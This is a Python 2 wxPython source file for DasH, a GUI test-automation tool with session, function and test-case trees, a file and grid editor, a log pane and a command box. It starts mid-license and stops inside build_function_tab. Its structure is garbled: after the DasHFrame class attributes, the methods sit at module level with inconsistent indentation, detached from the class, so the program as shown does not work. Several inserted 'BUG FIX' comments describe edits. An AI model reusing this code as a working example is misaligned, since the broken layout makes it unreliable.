furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.'''
__author__ = 'sean yu (Yu, Xiongwei)'
__doc__ = '''
it's GUI of DasH aka Do as Human
created 2017-05-06 by Sean Yu
'''
from datetime import datetime
import wx.grid as gridlib
import wx
from gui.MainFrame import MainFrame
import os
from lib.common import load_bench, caller_stack_info,info, get_next_in_ring_list,get_folder_item, info,debug, warn, error, parse_command_line, call_function_in_module
import re
import time
import threading
import ConfigParser
import sys
import inspect
import Queue
from SessionTab import SessionTab
import imp
import types
#from dut import dut
class RedirectText(object):
    """File-like object that tees writes to a wx text control.

    Installed as sys.stdout/sys.stderr: each write goes to the original
    stdout, to the text control (colour-coded, via wx.CallAfter so it is
    safe from worker threads) and, when a log_path was given, to dash.log.
    """
    font_point_size = 10
    old_stdout = None      # original sys.stdout, restored by the caller
    old_stderr = None      # original sys.stderr, restored by the caller
    write_lock = None      # serializes interleaved writes from threads
    log_file = None        # optional dash.log copy

    def __init__(self, aWxTextCtrl, log_path=None):
        """@param aWxTextCtrl: target text control for the output.
        @param log_path: optional directory that receives dash.log."""
        self.old_stderr, self.old_stdout = sys.stderr, sys.stdout
        self.out = aWxTextCtrl
        self.font_point_size = self.out.GetFont().PointSize
        self.write_lock = threading.Lock()
        if log_path:
            name = '{}/dash.log'.format(log_path)
            self.log_file = open(name, 'w+')
            self.fileno = self.log_file.fileno

    def write(self, string):
        """Write *string* to stdout, the text control and the log file.

        Lines containing error-ish keywords are rendered red-on-yellow in
        a larger bold font; everything else green-on-black.
        """
        self.write_lock.acquire()
        # BUG FIX: release the lock even if a write raises, otherwise one
        # failed write deadlocks every later one.
        try:
            self.old_stdout.write(string)
            #string = string.replace('\\033\[[0-9\;]+m', '')
            #self.old_stderr.write(string)
            if re.search('error|\s+err\s+|fail|wrong', string.lower()):
                self.out.SetDefaultStyle(wx.TextAttr(wx.RED, wx.YELLOW, font=wx.Font(self.font_point_size + 2, family=wx.DEFAULT, style=wx.NORMAL, weight=wx.BOLD, faceName='Consolas')))
            else:
                self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK, font=wx.Font(self.font_point_size, family=wx.DEFAULT, style=wx.NORMAL, weight=wx.NORMAL, faceName='Consolas')))
            # AppendText must run on the GUI thread.
            wx.CallAfter(self.out.AppendText, string)
            if self.log_file:
                self.log_file.write(string)
                self.log_file.flush()
        finally:
            self.write_lock.release()

    def flush(self):
        """File-protocol flush; required of a sys.stdout replacement.

        BUG FIX: the original class had no flush(), so any caller doing
        sys.stdout.flush() raised AttributeError.
        """
        self.old_stdout.flush()
        if self.log_file:
            self.log_file.flush()

    def close(self):
        """Flush and close the log file (stdout/stderr restored by caller)."""
        if self.log_file:
            self.log_file.flush()
            self.log_file.close()
class process_info(object):
    """Lightweight record about a spawned test-script process.

    Wraps a Popen-like object; `returncode` is read live from the wrapped
    process so callers always see its current completion state.
    """
    process = None     # the wrapped Popen-like object
    pid = None         # its process id, captured at construction
    full_name = None   # display name of the script

    def __init__(self, name, process):
        """@param name: display name of the script.
        @param process: Popen-like object exposing pid and returncode."""
        self.process = process
        self.pid = process.pid
        self.full_name = name
        # BUG FIX: the original also assigned self.returncode here, which
        # raises AttributeError because `returncode` is a read-only
        # property; the property below already delegates to the process.

    @property
    def returncode(self):
        return self.process.returncode
class FileEditor(wx.Panel):
    """Edit-area page presenting one file, either as text or as a grid.

    type 'text' loads the file into a multi-line TextCtrl; any other type
    creates a 50x5 wx.grid sheet ('Function Name' plus argument columns).
    Ctrl+mouse-wheel zooms the font. on_close() writes the buffer back.
    """
    editor = None           # the TextCtrl or Grid widget
    font_size = 10
    parent = None
    type = None             # 'text' or 'grid'
    sessions_node = None
    function_node = None
    case_suite_node = None
    full_file_name = None   # path the page was loaded from / saves to
    file_instance = None

    def on_close(self):
        # Persist the (possibly edited) contents back to the source file.
        # NOTE(review): Grid editors have no GetValue(); this looks safe
        # only for 'text' pages — confirm grid pages never reach here.
        if self.full_file_name:
            data = self.editor.GetValue()
            with open(self.full_file_name, 'w') as f:
                f.write(data)
                f.flush()
        #done 2017-9-12: handle close tab in edit_area

    def __init__(self, parent, title='pageOne', type='grid', file_name=None):
        """@param parent: notebook that owns this page.
        @param type: 'text' for a text editor, anything else for a grid.
        @param file_name: file to load (text mode reads it immediately)."""
        wx.Panel.__init__(self, parent)
        self.parent = parent
        self.type = type
        self.full_file_name = file_name
        #self.editor = wx.TextCtrl(self, style = wx.TE_MULTILINE|wx.TE_RICH2|wx.EXPAND|wx.ALL, size=(-1,-1))
        if type in ['text']:
            self.editor = wx.TextCtrl(self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_AUTO_URL | wx.VSCROLL | wx.TE_RICH | wx.TE_MULTILINE & (~wx.TE_PROCESS_ENTER))
            #wx.richtext.RichTextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS )
            with open(self.full_file_name, 'r') as f:
                for line in f.readlines():
                    self.editor.AppendText(line)
        else:
            # Grid mode: fixed 50x5 sheet, first column for function
            # names (bold black), remaining columns for arguments (blue).
            self.editor = gridlib.Grid(self)
            self.editor.CreateGrid(50, 5)
            col = self.editor.GetNumberCols()
            row = self.editor.GetNumberRows()
            function_color = 'black'
            arg_color = 'blue'
            for c in range(0, col):
                if c < 1:
                    self.editor.SetColLabelValue(c, 'Function Name')
                else:
                    self.editor.SetColLabelValue(c, 'arg# {}'.format(c))
                for r in range(0, row):
                    self.editor.SetCellTextColour(r, c, function_color if c < 1 else arg_color)
            for r in range(0, row):
                self.editor.SetCellFont(r, 0, wx.Font(self.font_size, wx.SWISS, wx.NORMAL, wx.BOLD))
        self.editor.Bind(wx.EVT_MOUSEWHEEL, self.editor_OnMouseWheel)
        sizer = wx.BoxSizer()
        sizer.Add(self.editor, 1, wx.EXPAND)
        self.SetSizer(sizer)

    def editor_OnMouseWheel(self, event):
        # Ctrl+wheel zooms the editor font; plain wheel is ignored here.
        min_font_size = 5
        interval_step = 2
        if event.ControlDown():
            pass
        else:
            return
        if event.GetWheelRotation() < 0:
            # NOTE(review): zoom steps are asymmetric (down by 2, up by 1)
            # and there is no upper bound — confirm this is intentional.
            if self.font_size > min_font_size:
                self.font_size -= interval_step
        else:
            self.font_size += 1
        if self.type in ['text']:
            f = self.editor.GetFont()
            f.PointSize = self.font_size
            self.editor.SetFont(f)
        else:
            # Grid fonts are per-cell; resize every cell.
            col = self.editor.GetNumberCols()
            row = self.editor.GetNumberRows()
            for c in range(0, col):
                for r in range(0, row):
                    f = self.editor.GetCellFont(r, c)
                    f.PointSize = self.font_size
                    self.editor.SetCellFont(r, c, f)
        self.Refresh()
#wx.StaticText(self, -1, "THIS IS A PAGE OBJECT", (20,20))
#DONE: DasHFrame should handle CLOSE event when closing the app, call on_close_tab_in_edit_area for all opened sessions and files
class DasHFrame(MainFrame):#wx.Frame
    """Main DasH window: navigation trees on the left, tabbed edit area,
    log pane and a command box wired to the recorded-command machinery."""
    # NOTE(review): the mutable defaults below (history_cmd,
    # import_modules) are class attributes and therefore shared by all
    # instances — acceptable for a singleton frame, but worth confirming.
    ini_setting = None          # ConfigParser over gDasH.ini
    #m_left_navigator =None
    redir = None                # RedirectText capturing stdout/stderr
    edit_area = None            # AuiNotebook holding file/session tabs
    tabs_in_edit_area = None    # names of open tabs
    src_path = None
    sessions_alive = None       # ses_name -> SessionTab name
    sequence_queue = None       # recorded commands for generate_code()
    history_cmd = []
    history_cmd_index = -1
    import_modules = {'TC': 'TC'}
    lib_path = './lib'
    log_path = '../log'
    session_path = './sessions'
    suite_path = '../test_suite'
    running_process = None      # [name, Popen] pairs of launched scripts
    dict_test_report = None     # pid -> {case: [start, end, dur, rc, proc]}
def __init__(self, parent=None, ini_file='./gDasH.ini'):
    """Build the whole UI and wire every event handler.

    Reads paths from *ini_file* (section [dash]), prepares the log/suite/
    lib/src directories, redirects stdout/stderr into the log pane, then
    creates the navigation trees, edit area, sizers and menus.
    """
    #wx.Frame.__init__(self, None, title="DasH")
    self.dict_test_report = {}
    self.running_process = list()
    self.tabs_in_edit_area = []
    self.sessions_alive = {}
    MainFrame.__init__(self, parent=parent)
    self.sequence_queue = Queue.Queue()
    #self.sequence_queue.put()
    # All paths come from gDasH.ini, section [dash].
    self.ini_setting = ConfigParser.ConfigParser()
    self.ini_setting.read(ini_file)
    self.src_path = os.path.abspath(self.ini_setting.get('dash', 'src_path'))
    self.lib_path = os.path.abspath(self.ini_setting.get('dash', 'lib_path'))
    self.log_path = os.path.abspath(self.ini_setting.get('dash', 'log_path'))
    self.suite_path = os.path.abspath(self.ini_setting.get('dash', 'test_suite_path'))
    from lib.common import create_case_folder, create_dir
    # Mimic the CLI's '-l <log_path>' so shared lib code finds the logs.
    sys.argv.append('-l')
    sys.argv.append('{}'.format(self.log_path))
    self.log_path = create_case_folder(self.log_path)
    self.suite_path = create_dir(self.suite_path)
    self.lib_path = create_dir(self.lib_path)
    self.src_path = create_dir(self.src_path)
    if not os.path.exists(self.log_path):
        os.mkdir(self.log_path)
    self.add_src_path_to_python_path(self.src_path)
    # Tee stdout/stderr into the log pane and dash.log.
    self.redir = RedirectText(self.m_log, self.log_path)
    sys.stdout = self.redir
    sys.stderr = self.redir
    self.m_log.SetBackgroundColour('Black')
    self.m_log.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK, font=wx.Font(9, family=wx.DEFAULT, style=wx.NORMAL, weight=wx.BOLD, faceName='Consolas')))
    #self.m_editor.WriteText('welcome to dash world')
    self.m_log.WriteText('Welcome to DasH!\n')
    # Example command pre-typed for the user.
    self.m_command_box.WriteText('functions.static_function_in_module test_ssh 2')
    fileMenu = wx.Menu()
    open_test_suite = fileMenu.Append(wx.NewId(), "Open TestSuite", "Open a Test Suite")
    open_test_case = fileMenu.Append(wx.NewId(), "Open TestCase", "Open a Test Case")
    self.m_menubar_main.Append(fileMenu, "&Open")
    self.Bind(wx.EVT_CLOSE, self.on_close)
    self.m_command_box.Bind(wx.EVT_TEXT_ENTER, self.on_command_enter)
    self.m_command_box.Bind(wx.EVT_KEY_UP, self.on_key_up)
    self.m_command_box.Bind(wx.EVT_KEY_DOWN, self.on_key_down)
    from wx.aui import AuiNotebook
    # Left navigator: SESSION / FUNCTION / CASE trees in an AUI notebook.
    bookStyle = wx.aui.AUI_NB_DEFAULT_STYLE & (~wx.aui.AUI_NB_CLOSE_ON_ACTIVE_TAB)
    self.navigator = AuiNotebook(self.m_left_navigator, style=bookStyle)
    self.case_suite_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
    self.function_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
    self.session_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
    self.navigator.AddPage(self.session_page, 'SESSION')
    self.navigator.AddPage(self.function_page, 'FUNCTION')
    self.navigator.AddPage(self.case_suite_page, 'CASE')
    self.edit_area = AuiNotebook(self.m_file_editor, style=wx.aui.AUI_NB_DEFAULT_STYLE)
    self.edit_area.Bind(wx.aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.on_close_tab_in_edit_area, self.edit_area)
    if False:
        # Dead code kept for reference: sample FileEditor tab.
        new_page = FileEditor(self.edit_area, 'a', type=type)
        self.edit_area.AddPage(new_page, 'test')
        self.tabs_in_edit_area.append(('test'))
    self.edit_area.Enable(True)
    right_sizer = wx.BoxSizer(wx.VERTICAL)
    #right_sizer =wx.GridSizer( 3, 1, 0, 0 )
    left_sizer = wx.BoxSizer(wx.HORIZONTAL)
    left_sizer.Add(self.m_left_navigator, 1, wx.EXPAND)
    self.case_suite_page.Bind(wx.EVT_LEFT_DCLICK, self.m_case_treeOnLeftDClick)
    #self.case_suite_page.Bind(wx.EVT_MOUSEWHEEL, self.case_tree_OnMouseWheel)
    self.case_suite_page.Bind(wx.EVT_TREE_ITEM_EXPANDING, self.m_case_treeOnTreeItemExpanding)
    self.session_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Session_tab)
    self.function_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Function_tab)
    self.function_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_function_tab)
    self.case_suite_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_case_tab)
    main_sizer = wx.BoxSizer(wx.HORIZONTAL)
    #main_sizer = wx.GridSizer( 1, 2, 0, 0 )
    nav_sizer = wx.BoxSizer()
    nav_sizer.Add(self.navigator, 1, wx.EXPAND, 1)
    self.m_left_navigator.SetSizer(nav_sizer)
    #main_sizer = wx.BoxSizer(wx.HORIZONTAL)
    #main_sizer.Add(left_sizer, 3, wx.EXPAND)
    main_sizer.Add(left_sizer, 2, wx.EXPAND)
    edit_sizer = wx.BoxSizer()
    edit_sizer.Add(self.edit_area, 1, wx.EXPAND, 1)
    self.m_file_editor.SetSizer(edit_sizer)
    right_sizer.Add(self.m_file_editor, 6, wx.ALL | wx.EXPAND, 1)
    right_sizer.Add(self.m_log, 3, wx.ALL | wx.EXPAND, 2)
    right_sizer.Add(self.m_command_box, 0, wx.ALL | wx.EXPAND, 3)
    main_sizer.Add(right_sizer, 8, wx.EXPAND)
    self.SetSizer(main_sizer)
    # Fill the three navigation trees.
    self.build_session_tab()
    self.build_suite_tree()
    self.build_function_tab()
    ico = wx.Icon('./gui/dash.bmp', wx.BITMAP_TYPE_ICO)
    self.SetIcon(ico)
def on_close(self, event):
    """Frame close: dump the recorded script and the report, close every
    session tab, then restore the original stdout/stderr."""
    self.generate_code(file_name='{}/test_script.py'.format(self.suite_path))
    self.generate_report(filename='{}/dash_report.txt'.format(self.log_path))
    for index in range(0, self.edit_area.GetPageCount()): #len(self.tabs_in_edit_area)):
        closing_page = self.edit_area.GetPage(index)
        if isinstance(closing_page, (SessionTab)):
            if closing_page:
                name = closing_page.name
                self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(name))
                closing_page.on_close()
    self.redir.close()
    sys.stderr = self.redir.old_stderr
    sys.stdout = self.redir.old_stdout
    event.Skip()
def generate_report(self, filename):
    """Append a plain-text RESULT/name table for every launched script.

    A process whose returncode is still None is reported RUNNING; a zero
    returncode is PASS and a non-zero returncode is FAIL. Nothing is
    written when no script was launched.

    @param filename: report file to append to.
    """
    report = '''Test Report
RESULT\tScript Name\n'''
    if len(self.running_process):
        with open(filename, 'a+') as f:
            f.write(report)
            for pi in self.running_process:
                name, pro = pi[:2]
                if pro.returncode is None:
                    result = 'RUNNING'
                else:
                    # BUG FIX: the original had the mapping inverted
                    # ('PASS' if pro.returncode else 'FAIL'); a non-zero
                    # exit code means failure, matching on_kill_script.
                    result = 'FAIL' if pro.returncode else 'PASS'
                pid = pro.pid
                record = '\t'.join(['{}'.format(x) for x in [result, name]])
                report += record + '\n'
                f.write(record + '\n')
def on_close_tab_in_edit_area(self, event):
    """Handle a tab being closed in the edit area.

    Flushes the page via its on_close(); for SessionTab pages also drops
    the tab name from the bookkeeping list and tears down the module-level
    global session object created by add_new_session_to_globals().
    """
    #self.edit_area.GetPage(self.edit_area.GetSelection()).on_close()
    closing_page = self.edit_area.GetPage(self.edit_area.GetSelection())
    closing_page.on_close()
    if isinstance(closing_page, (SessionTab)):
        ses_name = closing_page.name
        # Forget the tab name so a re-opened session can reuse it.
        self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(ses_name))
        if globals().has_key(ses_name):  # Python 2 idiom
            #g = dict(globals())
            #globals()[ses_name]=None
            #del g[ses_name]
            # Close the live session object and remove the global binding.
            globals()[ses_name].close_session()
            del globals()[ses_name]
def add_item_to_subfolder_in_tree(self, node):
    """Populate *node* of the case/suite tree with its folder's entries.

    Each child carries its full 'path_name' as item data; directories are
    flagged as having children so they lazy-expand later. A missing folder
    marks the node red with a 'Not Exists!!!' suffix.
    """
    subfolder_path_name = self.case_suite_page.GetPyData(node)['path_name']
    items = get_folder_item(subfolder_path_name)
    if items is None:
        # BUG FIX: the original read the label via self.m_case_tree, a
        # control that does not exist on this frame; use the tree itself.
        self.case_suite_page.SetItemText(node, self.case_suite_page.GetItemText(node) + ' Not Exists!!!')
        self.case_suite_page.SetItemTextColour(node, wx.Colour(255, 0, 0))
        return
    for i in items:
        path_name = '{}/{}'.format(subfolder_path_name, i)
        base_name = os.path.basename(i)
        item_info = wx.TreeItemData({'path_name': path_name})
        new_item = self.case_suite_page.InsertItem(node, node, base_name)
        self.case_suite_page.SetItemData(new_item, item_info)
        if os.path.isdir(path_name):
            # Show an expander; children are added lazily on expand.
            self.case_suite_page.SetItemHasChildren(new_item)
def build_suite_tree(self):
    """Create the root of the test-suite tree and fill its first level."""
    suite_path = self.suite_path #os.path.abspath(self.ini_setting.get('dash','test_suite_path'))
    if not os.path.exists(suite_path):
        # Configured path missing: fall back to the working directory.
        suite_path = os.path.abspath(os.path.curdir)
    root = self.case_suite_page.AddRoot(os.path.basename(suite_path))
    self.case_suite_page.SetItemData(root, wx.TreeItemData({'path_name': suite_path}))
    self.add_item_to_subfolder_in_tree(root)
    self.case_suite_page.Expand(root)
# def OnSelChanged(self, event):
# item = event.GetItem()
# self.display.SetLabel(self.tree.GetItemText(item))
#def case_tree_OnMouseWheel(self, event):
def m_case_treeOnLeftDClick(self, event):
    """Double-click in the case tree: toggle folders, open files.

    Folders collapse/expand; files open in the edit area — tabular files
    (.csv/.xlsx/.xls) in a grid editor, everything else as text.
    """
    ht_item = self.case_suite_page.GetSelection()
    #ht_item = self.HitTest(event.GetPosition())
    item_name = self.case_suite_page.GetItemText(ht_item)
    item_data = self.case_suite_page.GetItemData(ht_item)
    if self.case_suite_page.ItemHasChildren(ht_item):
        if self.case_suite_page.IsExpanded(ht_item):
            self.case_suite_page.Collapse(ht_item)
        else:
            self.case_suite_page.ExpandAllChildren(ht_item)
    else:
        # BUG FIX: the original compared the whole file name against the
        # extension list ("foo.csv" in ['.csv', ...] is always False), so
        # the grid editor was never chosen; compare the extension instead.
        if os.path.splitext(item_name)[1].lower() in ['.csv', '.xlsx', '.xls']:
            type = 'grid'
        else:
            type = 'text'
        file_name = item_data.Data['path_name']
        new_page = FileEditor(self.edit_area, 'a', type=type, file_name=file_name)
        self.edit_area.AddPage(new_page, item_name)
        index = self.edit_area.GetPageIndex(new_page)
        self.edit_area.SetSelection(index)
def m_case_treeOnTreeItemExpanding(self, event):
    """Lazy-load a directory's children the first time it is expanded."""
    ht_item = self.case_suite_page.GetSelection()
    try:
        item_info = self.case_suite_page.GetPyData(ht_item)
        # Only populate once: a node that already has children was filled.
        if 0 == self.case_suite_page.GetChildrenCount(ht_item):
            if os.path.isdir(item_info['path_name']):
                self.add_item_to_subfolder_in_tree(ht_item)
    except Exception as e:
        # Best-effort: ignore items without data (e.g. nothing selected).
        pass
def build_session_tab(self):
        """(Re)build the SESSION tree from *.csv bench files in session_path.

        Every CSV in the configured session folder is parsed via load_bench();
        each bench becomes a top-level node and each of its sessions a child
        node carrying the session's attribute dict.  Relative ``login_step``
        paths are resolved against the session folder.  Malformed bench files
        are skipped silently.
        """
        if self.session_page.RootItem:
            self.session_page.DeleteAllItems()
        session_path = os.path.abspath(self.ini_setting.get('dash','session_path'))
        self.session_path= session_path
        if not os.path.exists(session_path):
            session_path= os.path.abspath(os.path.curdir)
        base_name = os.path.basename(session_path)
        sessions = {}
        root =self.session_page.AddRoot(base_name)
        item_info = wx.TreeItemData({'path_name':session_path})
        self.session_page.SetItemData(root, item_info)
        self.session_page.Expand(root)
        item_list = get_folder_item(session_path)
        session_files=[]
        for item in item_list:
            if os.path.isfile('{}/{}'.format(session_path,item)) and '{}'.format(item).lower().strip().endswith('.csv'):
                session_files.append(item)
        for csv_file in sorted(session_files):
            try:
                ses_in_bench = load_bench(os.path.abspath('{}/{}'.format(session_path, csv_file)))
                for bench in ses_in_bench:
                    for ses in ses_in_bench[bench]:
                        if ses_in_bench[bench][ses].has_key('login_step') and ses_in_bench[bench][ses]['login_step'].strip() not in ['', None]:
                            # Resolve the login_step script path relative to the session folder.
                            ses_in_bench[bench][ses].update(
                                {'login_step': os.path.abspath('{}/{}'.format(session_path, ses_in_bench[bench][ses]['login_step'].strip()))}
                            )
                sessions.update(ses_in_bench)
            except Exception as e:
                # Unparseable bench files are simply left out of the tree.
                pass
        root =self.session_page.GetRootItem()
        for file_name in sorted(sessions.keys()):
            item_name = os.path.basename(file_name)
            item_info = wx.TreeItemData({'file_name':file_name})
            new_bench = self.session_page.InsertItem(root, root, item_name)
            # BUG FIX: the item data was attached via self.case_suite_page (the
            # CASE tree) although these items live in self.session_page.
            self.session_page.SetItemData(new_bench, item_info)
            for ses in sorted(sessions[file_name]):
                item_name = ses
                item_info = wx.TreeItemData({'attribute':sessions[file_name][ses]})
                new_item = self.session_page.InsertItem(new_bench, new_bench, item_name)
                # BUG FIX: same wrong-tree issue as above.
                self.session_page.SetItemData(new_item, item_info)
        self.session_page.Expand(root)
        first_child = self.session_page.GetFirstChild(root)
        self.session_page.Expand(first_child[0])
def on_LeftDClick_in_Session_tab(self, event):
        """Open a SessionTab for the double-clicked session node.

        The session name becomes a module-level global bound to the new
        page, so it can be referenced from the command box; name clashes
        with existing tabs/globals are resolved by suffixing a counter or
        a leading underscore.
        """
        event.Skip()
        ses_name = self.session_page.GetItemText(self.session_page.GetSelection())
        # NOTE(review): the next line repeats the GetItemText call and discards
        # the result -- it appears to be redundant.
        self.session_page.GetItemText(self.session_page.GetSelection())
        session_attribute = self.session_page.GetItemData(self.session_page.GetSelection())
        # Only leaf nodes carry an 'attribute' dict (see build_session_tab);
        # bench/file nodes are ignored.
        if session_attribute.Data.has_key('attribute'):
            info(session_attribute.Data['attribute'])
            counter =1
            original_ses_name = ses_name
            # De-duplicate against already-open editor tabs: name, name_1, name_2, ...
            while ses_name in self.tabs_in_edit_area:
                ses_name= '{}_{}'.format(original_ses_name,counter)
                counter+=1
            # De-duplicate against module globals by prefixing an underscore once;
            # if both name and _name are taken, give up with an error.
            if globals().has_key(ses_name):
                if not globals().has_key('_{}'.format(ses_name)):
                    info("variable '{}' is existed in global, change the name to _{}".format(ses_name, ses_name))
                    ses_name='_{}'.format(ses_name)
                    self.session_page.SetItemText(self.session_page.GetSelection(), ses_name)
                else:
                    error(("variable '{}' is existed in global, please change the name".format(ses_name)))
                    return
            new_page = SessionTab(self.edit_area, ses_name, session_attribute.Data['attribute'], self.sequence_queue, log_path=self.log_path)
            window_id = self.edit_area.AddPage(new_page, ses_name)
            index = self.edit_area.GetPageIndex(new_page)
            self.edit_area.SetSelection(index)
            self.tabs_in_edit_area.append(ses_name)
            self.sessions_alive.update({ses_name: new_page.name})
            attribute = session_attribute.Data['attribute']
            # Placeholder path; add_new_session_to_globals rewrites it to the
            # real ``log_path`` variable in the generated script.
            log_path='a_fake_log_path_for_auto_script'
            attribute['log_path']=log_path
            self.add_new_session_to_globals(new_page, '{}'.format(attribute))
            #globals().update({ses_name: new_page.session})
def add_new_session_to_globals(self, new_page, args_str):
        """Publish *new_page* as a module global and record a matching
        ``dut.dut(...)`` construction command for script generation.

        @param new_page: the SessionTab just created; its ``name`` is used
            as the global variable name.
        @param args_str: repr of the session attribute dict; the fake log
            path placeholder is swapped for the ``log_path`` variable and
            ``not_call_open`` is forced to False in the generated code.
        """
        if globals().has_key(new_page.name):
            if globals()[new_page.name]==None:
                pass
            else:
                error('{} already '.format(new_page.name))
        else:
            globals().update({new_page.name: new_page})
        self.add_cmd_to_sequence_queue('{} = dut.dut(name= "{}", **{})'.format(new_page.name,new_page.name,args_str.replace("'a_fake_log_path_for_auto_script'",'log_path').replace("'not_call_open': True,", "'not_call_open': False,") ), 'dut')
        #session = dut(name, **attributes)
def on_command_enter(self, event):
        """Parse and execute the command typed into the command box.

        The command is expected in ``module.class.function args`` or
        ``module.function args`` form; the resolved callable is run on a
        worker thread so the GUI stays responsive, and the command is
        appended to the history / code-generation queue.
        """
        info('called on_command_enter')
        cmd = self.m_command_box.GetValue()
        self.m_command_box.Clear()
        if cmd.strip()=='':
            return
        module,class_name, function,args = parse_command_line(cmd)
        #args[0]=self.sessions_alive['test_ssh'].session
        if module !='' or class_name!='' or function!='':
            # call_function_in_module resolves the target against module
            # globals and also returns the source line for code generation.
            instance_name, function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module,class_name,function,args, globals())
            call_function = None
            if class_name!="":
                call_function = getattr(instance_name, function_name)
                #(*new_argvs,**new_kwargs)
            else:
                call_function = instance_name#(*new_argvs,**new_kwargs)
            # Run on a background thread so long-running calls don't block the UI.
            th =threading.Thread(target=call_function, args=new_argvs, kwargs=new_kwargs)
            th.start()
            self.add_cmd_to_history(cmd, module, str_code)
        else:
            error('"{}" is NOT a valid call in format:\n\tmodule.class.function call or \n\tmodule.function'.format(cmd))
def add_src_path_to_python_path(self, path):
        """Prepend each existing directory from the ';'-separated *path*
        to sys.path, skipping entries that are already present."""
        existing = sys.path
        for candidate in path.split(';'):
            if candidate in existing:
                info('path {} already in sys.path'.format(candidate))
                continue
            abspath = os.path.abspath(candidate)
            if os.path.exists(abspath):
                sys.path.insert(0,abspath)
            else:
                warn('path {} is not existed, ignored to add it into sys.path'.format(candidate))
def on_key_down(self, event):
        """Submit the command box on Tab or Shift+'/' (i.e. '?').

        Tab appends a literal tab and submits (used for completion-style
        queries); Shift+'/' appends '?' and submits.  All other keys are
        passed through.
        """
        #error(event.KeyCode)
        keycode = event.KeyCode
        if keycode ==wx.WXK_TAB:
            self.m_command_box.AppendText('\t')
            self.on_command_enter(event)
        elif keycode == ord('/') and wx.GetKeyState(wx.WXK_SHIFT):
            # BUG FIX: the original compared against wx.PAPER_ENV_INVITE (a
            # paper-size constant, unrelated to keyboard input).  Shift+'/'
            # is the keystroke that actually produces '?'.
            self.m_command_box.AppendText('?')
            self.on_command_enter(event)
        else:
            event.Skip()
def on_key_up(self, event):
        """Cycle through the command history with the Up/Down arrow keys.

        Up recalls older commands, Down newer ones (ring buffer).  Tab is
        swallowed here (already handled on key-down); everything else is
        propagated.
        """
        keycode = event.KeyCode
        if keycode in (wx.WXK_UP, wx.WXK_DOWN):
            # Down moves forward through the ring, Up moves backward.
            step_forward = (keycode == wx.WXK_DOWN)
            self.m_command_box.Clear()
            self.history_cmd_index, recalled = get_next_in_ring_list(self.history_cmd_index,self.history_cmd,increase=step_forward)
            self.m_command_box.AppendText(recalled)
            event.Skip()
        elif keycode == wx.WXK_TAB:
            pass
        else:
            event.Skip()
def add_cmd_to_history(self, cmd, module_name, str_code):
        """Append *cmd* to the recall history (skipping consecutive
        duplicates) and forward its generated source line to the
        code-generation queue."""
        repeated = bool(self.history_cmd) and self.history_cmd[-1] == cmd
        if not repeated:
            self.history_cmd.append(cmd)
        # Point the recall cursor one past the newest entry.
        self.history_cmd_index = len(self.history_cmd)
        self.add_cmd_to_sequence_queue(str_code, module_name)
        #self.sequence_queue.put([cmd, datetime.now()])
def build_function_tab(self):
        """Populate the FUNCTION tree from the modules found in src_path.

        Every importable module becomes a top-level node; its functions are
        direct children, and its classes become sub-nodes with their methods
        as children.  Each leaf carries the dotted call path in its item data.
        """
        src_path = os.path.abspath(self.src_path)
        if not os.path.exists(src_path):
            src_path= os.path.abspath(os.path.curdir)
        base_name = os.path.basename(src_path)
        root =self.function_page.AddRoot(base_name)
        item_info = wx.TreeItemData({'name':src_path})
        self.function_page.SetItemData(root, item_info)
        modules = get_folder_item(src_path)
        if modules is None:
            self.function_page.SetItemText(root, self.function_page.GetItemText(root) + ' Not Exists!!!')
            self.function_page.SetItemTextColour(root, wx.Colour(255, 0, 0))
            return
        for module_file in modules:
            module_name = os.path.basename(module_file).split('.')[0]
            new_module = self.function_page.InsertItem(root, root, module_name)
            mod_fp, path_name, description = imp.find_module(module_name)
            try:
                lmod = imp.load_module(module_name, mod_fp, path_name,description)
            finally:
                # BUG FIX: imp.find_module returns an open file object for plain
                # modules; the original never closed it, leaking a descriptor
                # per module on every rebuild (it is None for packages).
                if mod_fp:
                    mod_fp.close()
